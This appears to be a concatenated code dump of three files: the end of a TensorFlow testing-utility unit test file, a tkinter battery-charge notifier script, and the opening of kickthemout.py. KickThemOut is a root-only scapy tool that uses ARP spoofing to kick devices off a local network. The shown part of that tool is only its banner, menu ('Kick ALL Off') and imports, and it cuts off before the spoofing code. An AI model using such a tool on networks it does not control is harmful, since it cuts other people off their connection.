{"bye": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"hello": "Variable"}, ops.get_default_graph())
@test_util.run_deprecated_v1
def test_session_functions(self):
with self.test_session() as sess:
sess_ref = weakref.ref(sess)
with self.cached_session(graph=None, config=None) as sess2:
# We make sure that sess2 is sess.
assert sess2 is sess
# We make sure we raise an exception if we use cached_session with
# different values.
with self.assertRaises(ValueError):
with self.cached_session(graph=ops.Graph()) as sess2:
pass
with self.assertRaises(ValueError):
with self.cached_session(force_gpu=True) as sess2:
pass
# We make sure that test_session will cache the session even after the
# with scope.
assert not sess_ref()._closed
with self.session() as unique_sess:
unique_sess_ref = weakref.ref(unique_sess)
with self.session() as sess2:
assert sess2 is not unique_sess
# We make sure the session is closed when we leave the with statement.
assert unique_sess_ref()._closed
def test_assert_equal_graph_def(self):
with ops.Graph().as_default() as g:
def_empty = g.as_graph_def()
constant_op.constant(5, name="five")
constant_op.constant(7, name="seven")
def_57 = g.as_graph_def()
with ops.Graph().as_default() as g:
constant_op.constant(7, name="seven")
constant_op.constant(5, name="five")
def_75 = g.as_graph_def()
# Comparing strings is order dependent
self.assertNotEqual(str(def_57), str(def_75))
# assert_equal_graph_def doesn't care about order
test_util.assert_equal_graph_def(def_57, def_75)
# Compare two unequal graphs
with self.assertRaisesRegexp(AssertionError,
r"^Found unexpected node '{{node seven}}"):
test_util.assert_equal_graph_def(def_57, def_empty)
def testIsGoogleCudaEnabled(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsGoogleCudaEnabled():
print("GoogleCuda is enabled")
else:
print("GoogleCuda is disabled")
def testIsBuiltWithROCm(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsBuiltWithROCm():
print("Tensorflow build has ROCm support")
else:
print("Tensorflow build does not have ROCm support")
def testIsMklEnabled(self):
# This test doesn't assert anything.
# It ensures the py wrapper function is generated correctly.
if test_util.IsMklEnabled():
print("MKL is enabled")
else:
print("MKL is disabled")
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsStr(self):
graph_str = "node { name: 'w1' op: 'params' }"
graph_def = graph_pb2.GraphDef()
text_format.Merge(graph_str, graph_def)
# test string based comparison
self.assertProtoEquals(graph_str, graph_def)
# test original comparison
self.assertProtoEquals(graph_def, graph_def)
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsAny(self):
# Test assertProtoEquals with a protobuf.Any field.
meta_graph_def_str = """
meta_info_def {
meta_graph_version: "outer"
any_info {
[type.googleapis.com/tensorflow.MetaGraphDef] {
meta_info_def {
meta_graph_version: "inner"
}
}
}
}
"""
meta_graph_def_outer = meta_graph_pb2.MetaGraphDef()
meta_graph_def_outer.meta_info_def.meta_graph_version = "outer"
meta_graph_def_inner = meta_graph_pb2.MetaGraphDef()
meta_graph_def_inner.meta_info_def.meta_graph_version = "inner"
meta_graph_def_outer.meta_info_def.any_info.Pack(meta_graph_def_inner)
self.assertProtoEquals(meta_graph_def_str, meta_graph_def_outer)
self.assertProtoEquals(meta_graph_def_outer, meta_graph_def_outer)
# Check if the assertion failure message contains the content of
# the inner proto.
with self.assertRaisesRegexp(AssertionError,
r'meta_graph_version: "inner"'):
self.assertProtoEquals("", meta_graph_def_outer)
@test_util.run_in_graph_and_eager_modes
def testNDArrayNear(self):
a1 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a2 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a3 = np.array([[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]])
self.assertTrue(self._NDArrayNear(a1, a2, 1e-5))
self.assertFalse(self._NDArrayNear(a1, a3, 1e-5))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadSucceeds(self):
def noop(ev):
ev.set()
event_arg = threading.Event()
self.assertFalse(event_arg.is_set())
t = self.checkedThread(target=noop, args=(event_arg,))
t.start()
t.join()
self.assertTrue(event_arg.is_set())
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadFails(self):
def err_func():
return 1 // 0
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("integer division or modulo by zero" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadWithWrongAssertionFails(self):
x = 37
def err_func():
self.assertTrue(x < 10)
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("False is not true" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testMultipleThreadsWithOneFailure(self):
def err_func(i):
self.assertTrue(i != 7)
threads = [
self.checkedThread(
target=err_func, args=(i,)) for i in range(10)
]
for t in threads:
t.start()
for i, t in enumerate(threads):
if i == 7:
with self.assertRaises(self.failureException):
t.join()
else:
t.join()
def _WeMustGoDeeper(self, msg):
with self.assertRaisesOpError(msg):
with ops.Graph().as_default():
node_def = ops._NodeDef("IntOutput", "name")
node_def_orig = ops._NodeDef("IntOutput", "orig")
op_orig = ops.Operation(node_def_orig, ops.get_default_graph())
op = ops.Operation(node_def, ops.get_default_graph(),
original_op=op_orig)
raise errors.UnauthenticatedError(node_def, op, "true_err")
@test_util.run_in_graph_and_eager_modes
def testAssertRaisesOpErrorDoesNotPassMessageDueToLeakedStack(self):
with self.assertRaises(AssertionError):
self._WeMustGoDeeper("this_is_not_the_error_you_are_looking_for")
self._WeMustGoDeeper("true_err")
self._WeMustGoDeeper("name")
self._WeMustGoDeeper("orig")
@test_util.run_in_graph_and_eager_modes
def testAllCloseTensors(self):
a_raw_data = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
a = constant_op.constant(a_raw_data)
b = math_ops.add(1, constant_op.constant([[0, 1, 2], [3, 4, 5], [6, 7, 8]]))
self.assertAllClose(a, b)
self.assertAllClose(a, a_raw_data)
a_dict = {"key": a}
b_dict = {"key": b}
self.assertAllClose(a_dict, b_dict)
x_list = [a, b]
y_list = [a_raw_data, b]
self.assertAllClose(x_list, y_list)
@test_util.run_in_graph_and_eager_modes
def testAllCloseScalars(self):
self.assertAllClose(7, 7 + 1e-8)
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(7, 7 + 1e-5)
@test_util.run_in_graph_and_eager_modes
def testAllCloseList(self):
with self.assertRaisesRegexp(AssertionError, r"not close dif"):
self.assertAllClose([0], [1])
@test_util.run_in_graph_and_eager_modes
def testAllCloseDictToNonDict(self):
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose(1, {"a": 1})
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose({"a": 1}, 1)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNamedtuples(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
my_named_tuple = collections.namedtuple("MyNamedTuple", ["a", "b", "c"])
# Identity.
self.assertAllClose(expected, my_named_tuple(a=a, b=b, c=c))
self.assertAllClose(
my_named_tuple(a=a, b=b, c=c), my_named_tuple(a=a, b=b, c=c))
@test_util.run_in_graph_and_eager_modes
def testAllCloseDicts(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
# Identity.
self.assertAllClose(expected, expected)
self.assertAllClose(expected, dict(expected))
# With each item removed.
for k in expected:
actual = dict(expected)
del actual[k]
with self.assertRaisesRegexp(AssertionError, r"mismatched keys"):
self.assertAllClose(expected, actual)
# With each item changed.
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a + 1e-5, "b": b, "c": c})
with self.assertRaisesRegexp(AssertionError, r"Shape mismatch"):
self.assertAllClose(expected, {"a": a, "b": b + (4.,), "c": c})
c_copy = np.array(c)
c_copy[1, 1, 1] += 1e-5
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a, "b": b, "c": c_copy})
@test_util.run_in_graph_and_eager_modes
def testAllCloseListOfNamedtuples(self):
my_named_tuple = collections.namedtuple("MyNamedTuple", ["x", "y"])
l1 = [
my_named_tuple(x=np.array([[2.3, 2.5]]), y=np.array([[0.97, 0.96]])),
my_named_tuple(x=np.array([[3.3, 3.5]]), y=np.array([[0.98, 0.99]]))
]
l2 = [
([[2.3, 2.5]], [[0.97, 0.96]]),
([[3.3, 3.5]], [[0.98, 0.99]]),
]
self.assertAllClose(l1, l2)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNestedStructure(self):
a = {"x": np.ones((3, 2, 4)) * 7, "y": (2, [{"nested": {"m": 3, "n": 4}}])}
self.assertAllClose(a, a)
b = copy.deepcopy(a)
self.assertAllClose(a, b)
# Test mismatched values
b["y"][1][0]["nested"]["n"] = 4.2
with self.assertRaisesRegexp(AssertionError,
r"\[y\]\[1\]\[0\]\[nested\]\[n\]"):
self.assertAllClose(a, b)
@test_util.run_in_graph_and_eager_modes
def testArrayNear(self):
a = [1, 2]
b = [1, 2, 5]
with self.assertRaises(AssertionError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [[1, 2], [3, 4]]
with self.assertRaises(TypeError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [1, 2]
self.assertArrayNear(a, b, 0.001)
@test_util.skip_if(True) # b/117665998
def testForceGPU(self):
with self.assertRaises(errors.InvalidArgumentError):
with self.test_session(force_gpu=True):
# this relies on us not having a GPU implementation for assert, which
# seems sensible
x = constant_op.constant(True)
y = [15]
control_flow_ops.Assert(x, y).run()
@test_util.run_in_graph_and_eager_modes
def testAssertAllCloseAccordingToType(self):
# test plain int
self.assertAllCloseAccordingToType(1, 1, rtol=1e-8, atol=1e-8)
# test float64
self.assertAllCloseAccordingToType(
np.asarray([1e-8], dtype=np.float64),
np.asarray([2e-8], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-8], dtype=dtypes.float64),
constant_op.constant([2e-8], dtype=dtypes.float64),
rtol=1e-8,
atol=1e-8)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float64),
np.asarray([2e-7], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
# test float32
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float32),
np.asarray([2e-7], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-7], dtype=dtypes.float32),
constant_op.constant([2e-7], dtype=dtypes.float32),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-6], dtype=np.float32),
np.asarray([2e-6], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
# test float16
self.assertAllCloseAccordingToType(
np.asarray([1e-4], dtype=np.float16),
np.asarray([2e-4], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-4], dtype=dtypes.float16),
constant_op.constant([2e-4], dtype=dtypes.float16),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7,
half_rtol=1e-4,
half_atol=1e-4)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-3], dtype=np.float16),
np.asarray([2e-3], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
@test_util.run_in_graph_and_eager_modes
def testAssertAllEqual(self):
i = variables.Variable([100] * 3, dtype=dtypes.int32, name="i")
j = constant_op.constant([20] * 3, dtype=dtypes.int32, name="j")
k = math_ops.add(i, j, name="k")
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual([120] * 3, k)
self.assertAllEqual([20] * 3, j)
with self.assertRaisesRegexp(AssertionError, r"not equal lhs"):
self.assertAllEqual([0] * 3, k)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllClose(self):
# Test with arrays
self.assertNotAllClose([0.1], [0.2])
with self.assertRaises(AssertionError):
self.assertNotAllClose([-1.0, 2.0], [-1.0, 2.0])
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
self.assertNotAllClose([0.9, 1.0], x)
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.0, 1.0], x)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseRTol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], rtol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, rtol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseATol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], atol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, atol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLess(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllClose([110.0, 120.0, 130.0], z)
self.assertAllGreater(x, 95.0)
self.assertAllLess(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 95.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLessEqual(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllEqual([110.0, 120.0, 130.0], z)
self.assertAllGreaterEqual(x, 95.0)
self.assertAllLessEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 95.0)
@test_util.run_deprecated_v1
def testAssertAllInRangeWithNonNumericValuesFails(self):
s1 = constant_op.constant("Hello, ", name="s1")
c = constant_op.constant([1 + 2j, -3 + 5j], name="c")
b = constant_op.constant([False, True], name="b")
with self.assertRaises(AssertionError):
self.assertAllInRange(s1, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(c, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(b, 0, 1)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRange(self):
x = constant_op.constant([10.0, 15.0], name="x")
self.assertAllInRange(x, 10, 15)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_lower_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_upper_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(
x, 10, 15, open_lower_bound=True, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeErrorMessageEllipses(self):
x_init = np.array([[10.0, 15.0]] * 12)
x = constant_op.constant(x_init, name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 5, 10)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeDetectsNaNs(self):
x = constant_op.constant(
[[np.nan, 0.0], [np.nan, np.inf], [np.inf, np.nan]], name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 0.0, 2.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeWithInfinities(self):
x = constant_op.constant([10.0, np.inf], name="x")
self.assertAllInRange(x, 10, np.inf)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, np.inf, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInSet(self):
b = constant_op.constant([True, False], name="b")
x = constant_op.constant([13, 37], name="x")
self.assertAllInSet(b, [False, True])
self.assertAllInSet(b, (False, True))
self.assertAllInSet(b, {False, True})
self.assertAllInSet(x, [0, 13, 37, 42])
self.assertAllInSet(x, (0, 13, 37, 42))
self.assertAllInSet(x, {0, 13, 37, 42})
with self.assertRaises(AssertionError):
self.assertAllInSet(b, [False])
with self.assertRaises(AssertionError):
self.assertAllInSet(x, (42,))
@test_util.run_deprecated_v1
def testRandomSeed(self):
# Call setUp again for WithCApi case (since it makes a new defeault graph
# after setup).
# TODO(skyewm): remove this when C API is permanently enabled.
self.setUp()
a = random.randint(1, 1000)
a_np_rand = np.random.rand(1)
with self.test_session():
a_rand = random_ops.random_normal([1]).eval()
# ensure that randomness in multiple testCases is deterministic.
self.setUp()
b = random.randint(1, 1000)
b_np_rand = np.random.rand(1)
with self.test_session():
b_rand = random_ops.random_normal([1]).eval()
self.assertEqual(a, b)
self.assertEqual(a_np_rand, b_np_rand)
self.assertEqual(a_rand, b_rand)
@test_util.run_in_graph_and_eager_modes
def test_callable_evaluate(self):
def model():
return resource_variable_ops.ResourceVariable(
name="same_name",
initial_value=1) + 1
with context.eager_mode():
self.assertEqual(2, self.evaluate(model))
@test_util.run_in_graph_and_eager_modes
def test_nested_tensors_evaluate(self):
expected = {"a": 1, "b": 2, "nested": {"d": 3, "e": 4}}
nested = {"a": constant_op.constant(1),
"b": constant_op.constant(2),
"nested": {"d": constant_op.constant(3),
"e": constant_op.constant(4)}}
self.assertEqual(expected, self.evaluate(nested))
def test_run_in_graph_and_eager_modes(self):
l = []
def inc(self, with_brackets):
del self # self argument is required by run_in_graph_and_eager_modes.
mode = "eager" if context.executing_eagerly() else "graph"
with_brackets = "with_brackets" if with_brackets else "without_brackets"
l.append((with_brackets, mode))
f = test_util.run_in_graph_and_eager_modes(inc)
f(self, with_brackets=False)
f = test_util.run_in_graph_and_eager_modes()(inc)
f(self, with_brackets=True)
self.assertEqual(len(l), 4)
self.assertEqual(set(l), {
("with_brackets", "graph"),
("with_brackets", "eager"),
("without_brackets", "graph"),
("without_brackets", "eager"),
})
def test_get_node_def_from_graph(self):
graph_def = graph_pb2.GraphDef()
node_foo = graph_def.node.add()
node_foo.name = "foo"
self.assertIs(test_util.get_node_def_from_graph("foo", graph_def), node_foo)
self.assertIsNone(test_util.get_node_def_from_graph("bar", graph_def))
def test_run_in_eager_and_graph_modes_test_class(self):
msg = "`run_in_graph_and_eager_modes` only supports test methods.*"
with self.assertRaisesRegexp(ValueError, msg):
@test_util.run_in_graph_and_eager_modes()
class Foo(object):
pass
del Foo # Make pylint unused happy.
def test_run_in_eager_and_graph_modes_skip_graph_runs_eager(self):
modes = []
def _test(self):
if not context.executing_eagerly():
self.skipTest("Skipping in graph mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["eager"])
def test_run_in_eager_and_graph_modes_skip_eager_runs_graph(self):
modes = []
def _test(self):
if context.executing_eagerly():
self.skipTest("Skipping in eager mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["graph"])
@test_util.run_deprecated_v1
def test_run_in_graph_and_eager_modes_setup_in_same_mode(self):
modes = []
mode_name = lambda: "eager" if context.executing_eagerly() else "graph"
class ExampleTest(test_util.TensorFlowTestCase):
def runTest(self):
pass
def setUp(self):
modes.append("setup_" + mode_name())
@test_util.run_in_graph_and_eager_modes
def testBody(self):
modes.append("run_" + mode_name())
e = ExampleTest()
e.setUp()
e.testBody()
self.assertEqual(modes[0:2], ["setup_graph", "run_graph"])
self.assertEqual(modes[2:], ["setup_eager", "run_eager"])
@parameterized.named_parameters(dict(testcase_name="argument",
arg=True))
@test_util.run_in_graph_and_eager_modes
def test_run_in_graph_and_eager_works_with_parameterized_keyword(self, arg):
self.assertEqual(arg, True)
# Its own test case to reproduce variable sharing issues which only pop up when
# setUp() is overridden and super() is not called.
class GraphAndEagerNoVariableSharing(test_util.TensorFlowTestCase):
def setUp(self):
pass # Intentionally does not call TensorFlowTestCase's super()
@test_util.run_in_graph_and_eager_modes
def test_no_variable_sharing(self):
variable_scope.get_variable(
name="step_size",
initializer=np.array(1e-5, np.float32),
use_resource=True,
trainable=False)
class GarbageCollectionTest(test_util.TensorFlowTestCase):
def test_no_reference_cycle_decorator(self):
class ReferenceCycleTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_garbage_created
def test_has_cycle(self):
a = []
a.append(a)
@test_util.assert_no_garbage_created
def test_has_no_cycle(self):
pass
with self.assertRaises(AssertionError):
ReferenceCycleTest().test_has_cycle()
ReferenceCycleTest().test_has_no_cycle()
@test_util.run_in_graph_and_eager_modes
def test_no_leaked_tensor_decorator(self):
class LeakedTensorTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_new_tensors
def test_has_leak(self):
self.a = constant_op.constant([3.], name="leak")
@test_util.assert_no_new_tensors
def test_has_no_leak(self):
constant_op.constant([3.], name="no-leak")
with self.assertRaisesRegexp(AssertionError, "Tensors not deallocated"):
LeakedTensorTest().test_has_leak()
LeakedTensorTest().test_has_no_leak()
def test_no_new_objects_decorator(self):
class LeakedObjectTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
inner_self.accumulation = []
@test_util.assert_no_new_pyobjects_executing_eagerly
def test_has_leak(self):
self.accumulation.append([1.])
@test_util.assert_no_new_pyobjects_executing_eagerly
def test_has_no_leak(self):
self.not_accumulating = [1.]
with self.assertRaises(AssertionError):
LeakedObjectTest().test_has_leak()
LeakedObjectTest().test_has_no_leak()
if __name__ == "__main__":
googletest.main()
|
battery.py | import psutil
from plyer.utils import platform
from plyer import notification
import time
import tkinter
from tkinter import messagebox
from tkinter import *
from tkinter import ttk
from threading import *
import os
import sys
# function to exit from the application when called
def quit_prog():
# sys.exit()
os._exit(1)
# opens a new dialog box and has options to close the application in it
def the_close():
last_window = tkinter.Tk()
var = StringVar()
label = Message(last_window, textvariable=var, width=500)
# relief=RAISED
var.set("The values have been set. The application is running in the background. You can : \n-> Use this window to exit the application, or \n-> Minimize this window to let it run in the background.")
label.grid(row=0, column=0, columnspan=2)
close_button = ttk.Button(last_window, text='Exit', command=quit_prog)
# print("reached?")
close_button.grid(padx=100, pady=50, row=4, column=0)
last_window.protocol("WM_DELETE_WINDOW", quit_prog)
last_window.mainloop()
# raise an error message when called
def error():
messagebox.showerror(
"Error", "The values you have entered are not correct.")
# starts a thread for running the gui
def threading():
t1 = Thread(target=the_close)
t1.start()
# called when 'Apply' button is pressed. Checks if the entered values are valid, then proceeds to periodically evaluate the battery status
def callback():
global lower_lim
try:
lower_lim = int(e1.get())
except:
error()
os.execv(sys.executable, ['python'] + sys.argv)
# print(lower_lim)
if (not(lower_lim >= 0 and lower_lim <= 100)):
# print("Invalid Entry")
error()
os.execv(sys.executable, ['python'] + sys.argv)
# quit()
# higher_lim = int(input("Set Higher Limit for battery percentage : "))
global higher_lim
try:
higher_lim = int(e2.get())
except:
error()
os.execv(sys.executable, ['python'] + sys.argv)
# print(higher_lim)
if (not(higher_lim >= 0 and higher_lim <= 100 and higher_lim >= lower_lim)):
# print("Invalid Entry")
error()
os.execv(sys.executable, ['python'] + sys.argv)
# quit()
window.destroy()
# main_func(lower_lim,higher_lim)
# return lower_lim, higher_lim
threading()
while (1):
# print("inside")
battery = psutil.sensors_battery()
# apply_button.invoke()
if ((battery.power_plugged == True) and (battery.percent >= higher_lim)):
# print("battery percent : " , battery.percent , "power : " , battery.power_plugged , " higher lim : " , higher_lim)
notification.notify(
title='Battery Notifier',
message='Your Battery Level has crossed ' +
str(higher_lim) + '%. Please disconnect the charger',
app_name='Battery Notifier',
app_icon='./img.' + ('ico' if platform == 'win' else 'png')
)
if ((battery.power_plugged == False) and (battery.percent <= lower_lim)):
# print("battery percent : " , battery.percent , "power : " , battery.power_plugged)
notification.notify(
title='Battery Notifier',
message='Your Battery Level has gone below ' +
str(lower_lim) + '%. Please connect the charger',
app_name='Battery Notifier',
app_icon='./img.' + ('ico' if platform == 'win' else 'png')
)
# window.mainloop()
time.sleep(15)
# this section is setting up the main gui using tkinter
window = tkinter.Tk()
var = StringVar()
label = Message(window, textvariable=var, width=500)
# relief=RAISED
var.set("Use the below fields to set the desired values for the ideal upper and lower limits of battery charge percentage to prolong battery life.")
label.grid(row=0, column=0, columnspan=2)
Label(window, text='Minimum Desired Charging Percentage').grid(row=2)
Label(window, text='Maximum Desired Charging Percentage').grid(row=3)
e1 = Entry(window, bd=3)
e2 = Entry(window, bd=3)
e1.insert(END, '40')
e2.insert(END, '80')
e1.grid(row=2, column=1)
e2.grid(row=3, column=1)
lower_lim = 40
higher_lim = 80
# print("actual check : " , higher_lim)
apply_button = ttk.Button(window, text='Apply', command=callback)
# print("reached?")
apply_button.grid(padx=100, pady=50, row=4, column=0)
window.mainloop() |
kickthemout.py | #!/usr/bin/env python3
# -.- coding: utf-8 -.-
# kickthemout.py
"""
Copyright (C) 2017-18 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com)
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
"""
import os, sys, logging, math, traceback, optparse, threading
from time import sleep
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
try:
# check whether user is root
if os.geteuid() != 0:
print("\n{}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{}$ sudo python3 kickthemout.py{}\n".format(RED, GREEN, END))
os._exit(1)
except:
# then user is probably on windows
pass
def shutdown():
print('\n\n{}Thanks for dropping by.'
'\nCatch ya later!{}'.format(GREEN, END))
os._exit(1)
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy!
try:
from scapy.config import conf
conf.ipv6_enabled = False
from scapy.all import *
import scan, spoof, nmap
from urllib.request import urlopen, Request
except KeyboardInterrupt:
shutdown()
except:
print("\n{}ERROR: Requirements have not been satisfied properly. Please look at the README file for configuration instructions.".format(RED))
print("\n{}If you still cannot resolve this error, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n\n{}Details: {}{}{}".format(RED, BLUE, RED, GREEN, str(sys.exc_info()[1]), END))
os._exit(1)
# display heading
def heading():
spaces = " " * 76
sys.stdout.write(GREEN + spaces + """
█ █▀ ▄█ ▄█▄ █ █▀ ▄▄▄▄▀ ▄ █ ▄███▄ █▀▄▀█ ████▄ ▄ ▄▄▄▄▀
█▄█ ██ █▀ ▀▄ █▄█ ▀▀▀ █ █ █ █▀ ▀ █ █ █ █ █ █ ▀▀▀ █
█▀▄ ██ █ ▀ █▀▄ █ ██▀▀█ ██▄▄ █ ▄ █ █ █ █ █ █
█ █ ▐█ █▄ ▄▀ █ █ █ █ █ █▄ ▄▀ █ █ ▀████ █ █ █
█ ▐ ▀███▀ █ ▀ █ ▀███▀ █ █▄ ▄█ ▀
▀ ▀ ▀ ▀ ▀▀▀
""" + END + BLUE +
'\n' + '{}Kick Devices Off Your LAN ({}KickThemOut{}){}'.format(YELLOW, RED, YELLOW, BLUE).center(98) +
'\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(111) +
'\n' + 'Version: {}2.0{} \n'.format(YELLOW, END).center(86))
# loading animation during network scan
def scanningAnimation(text):
try:
global stopAnimation
i = 0
while stopAnimation is not True:
tempText = list(text)
if i >= len(tempText):
i = 0
tempText[i] = tempText[i].upper()
tempText = ''.join(tempText)
sys.stdout.write(GREEN + tempText + '\r' + END)
sys.stdout.flush()
i += 1
time.sleep(0.1)
except:
os._exit(1)
# display options
def optionBanner():
print('\nChoose an option from the menu:\n')
sleep(0.2)
print('\t{}[{}1{}]{} Kick ONE Off'.format(YELLOW, RED, YELLOW, WHITE))
sleep(0.2)
print('\t{}[{}2{}]{} Kick SOME Off'.format(YELLOW, RED, YELLOW, WHITE))
sleep(0.2)
print('\t{}[{}3{}]{} Kick ALL Off'.format(YELLOW, RED, YELLOW, WHITE))
sleep(0.2)
print('\n\t{}[{}E{}]{} Exit KickThemOut\n'.format(YELLOW, RED, YELLOW, WHITE))
# initiate debugging process
def runDebug():
print("\n\n{}WARNING! An unknown error has occurred, starting debug...{}".format(RED, END))
print(
"{}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){}".format(
RED, END))
try:
print("Current defaultGatewayMac: " + defaultGatewayMac)
except:
print("Failed to print defaultGatewayMac...")
try:
print("Reloading MAC retriever function...")
regenOnlineIPs()
print("Reloaded defaultGatewayMac: " + defaultGatewayMac)
except:
print("Failed to reload MAC retriever function / to print defaultGatewayMac...")
try:
